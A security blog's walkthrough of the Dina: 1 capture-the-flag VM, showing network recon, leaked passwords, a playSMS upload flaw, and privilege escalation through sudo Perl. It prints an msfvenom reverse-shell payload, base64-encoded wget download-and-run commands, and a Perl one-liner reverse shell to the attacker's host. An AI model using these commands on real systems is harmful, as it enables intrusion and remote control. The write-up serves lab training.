Amonsec

It's all about digital security.

A simple blog where you can find different things about digital security.

Dina: CTF walkthrough

Introduction

Name: Dina: 1
Date release: 10 Jul 2017

AuthorTouhid Shaikh
SeriesDina

Contact: touhidshaikh22 [at] gmaill [dot] com
Websitehttp://www.touhidshaikh.com
VM linkhttps://drive.google.com/open?id=0B1qWCgvhnTXgNUF6Rlp0c3Rlb0k

Note, the link to download the virtual system on VulnHub is not up to date. If you want to finish this CTF you have to download it from this link. Thanks for Touhid who provide me the good link after an short communication via emails.

 

Recognition

We retrieve the IP of the system.

dina_ctf_walkthrough_arp_scan.png

Let’s scan this system with nmap.

root@kali:~# nmap -A -O -T5 -p- --reason 192.168.1.51

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-21 06:38 CEST
Warning: 192.168.1.51 giving up on port because retransmission cap hit (2).
Nmap scan report for dina.home (192.168.1.51)
Host is up, received arp-response (0.010s latency).
Not shown: 65522 closed ports
Reason: 65522 resets
PORT      STATE    SERVICE       REASON         VERSION
80/tcp    open     http          syn-ack ttl 64 Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
3337/tcp  filtered directv-catlg no-response
10107/tcp filtered bctp-server   no-response
15290/tcp filtered unknown       no-response
23358/tcp filtered unknown       no-response
31816/tcp filtered unknown       no-response
33087/tcp filtered unknown       no-response
49219/tcp filtered unknown       no-response
50535/tcp filtered unknown       no-response
52909/tcp filtered unknown       no-response
55107/tcp filtered unknown       no-response
57197/tcp filtered unknown       no-response
62644/tcp filtered unknown       no-response
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop

TRACEROUTE
HOP RTT      ADDRESS
1   10.14 ms dina.home (192.168.1.51)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.73 seconds
root@kali:~#

Port 80 seems to be the only usable service.

 

Website analyse

According to the robots.txt file we have a directory called nothing and the index of this directory contains passwords. We will use them later.

root@kali:~# curl http://192.168.1.51/nothing/
<html>
<head><title>404 NOT FOUND</title></head>
<body>
<!--
#my secret pass
freedom
password
helloworld!
diana
iloveroot
-->
<h1>NOT FOUND</html>
<h3>go back</h3>
</body>
</html>
root@kali:~#

We can find another interesting directory: secure, with the gobuster tool.

root@kali:~/Desktop# gobuster -u http://192.168.1.51/ -w /usr/share/seclists/Discovery/Web_Content/common.txt \
> -s 200,204,301,302,307,403,500 -e -m dir

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.51/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 301,302,307,403,500,200,204
[+] Expanded     : true
=====================================================
http://192.168.1.51/.hta (Status: 403)
http://192.168.1.51/.htaccess (Status: 403)
http://192.168.1.51/.htpasswd (Status: 403)
http://192.168.1.51/cgi-bin/ (Status: 403)
http://192.168.1.51/index (Status: 200)
http://192.168.1.51/index.html (Status: 200)
http://192.168.1.51/robots (Status: 200)
http://192.168.1.51/robots.txt (Status: 200)
http://192.168.1.51/secure (Status: 301)
http://192.168.1.51/server-status (Status: 403)
http://192.168.1.51/tmp (Status: 301)
http://192.168.1.51/uploads (Status: 301)
=====================================================
root@kali:~/Desktop#

In this directory we can download a password protected ZIP file. Fortunately for us, previously found passwords can allow us to unzip this file.

password: freedom

This is not a real MP3 file, just a text file with an hint for the next step.

root@kali:~/Desktop# cat backup-cred.mp3 

I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....

uname: touhid
password: ******


url : /SecreTSMSgatwayLogin
root@kali:~/Desktop#

We gain access to the admin panel of the playSMS web application with this following credentials.

touhid:diana
 

 ‘sendfromfile.php’ vulnerability

Related to this exploit (from VM author), we can execute PHP code if we change the name of the uploaded file via Burp Suite.

We generate an msfvenom Linux reverse shell.

root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.102 -f elf -o rshell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: rshell
root@kali:~#

Note, in order to bypass bad characters we will use base64 encoding. Here you have the commands that will be use.

root@kali:~# echo 'wget http://192.168.1.102/rshell -O /tmp/rshell' |base64
d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwMi9yc2hlbGwgLU8gL3RtcC9yc2hlbGwK
root@kali:~# 
root@kali:~# 
root@kali:~# echo 'chmod 777 /tmp/rshell; ls -la /tmp/rshell' |base64
Y2htb2QgNzc3IC90bXAvcnNoZWxsOyBscyAtbGEgL3RtcC9yc2hlbGwK
root@kali:~# 
root@kali:~# echo '/tmp/rshell' |base64 
L3RtcC9yc2hlbGwK
root@kali:~#

We upload our reverse shell on Dina.

dina_ctf_walkthrough_upload_reverse_shell.png

Finally, we execute our reverse shell in order to gain a low privilege shell.

dina_ctf_walkthrough_execute_the_reverse_shell.png
dina_ctf_walkthrough_low_priv_reverse_shell.png
 

Privilege escalation

Let’s see what we can do with our user.

dina_ctf_walkthrough_sudo_vulnerability.png

Nice, we are able to execute any kind of perl code with root privileges.

We can use a one-liner Perl reverse shell command to gain a root reverse shell.

www-data@Dina:/var$ sudo perl -e 'use Socket;$i="192.168.1.102";$p=666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
dina_ctf_walkthrough_root_shell.png
 
 

break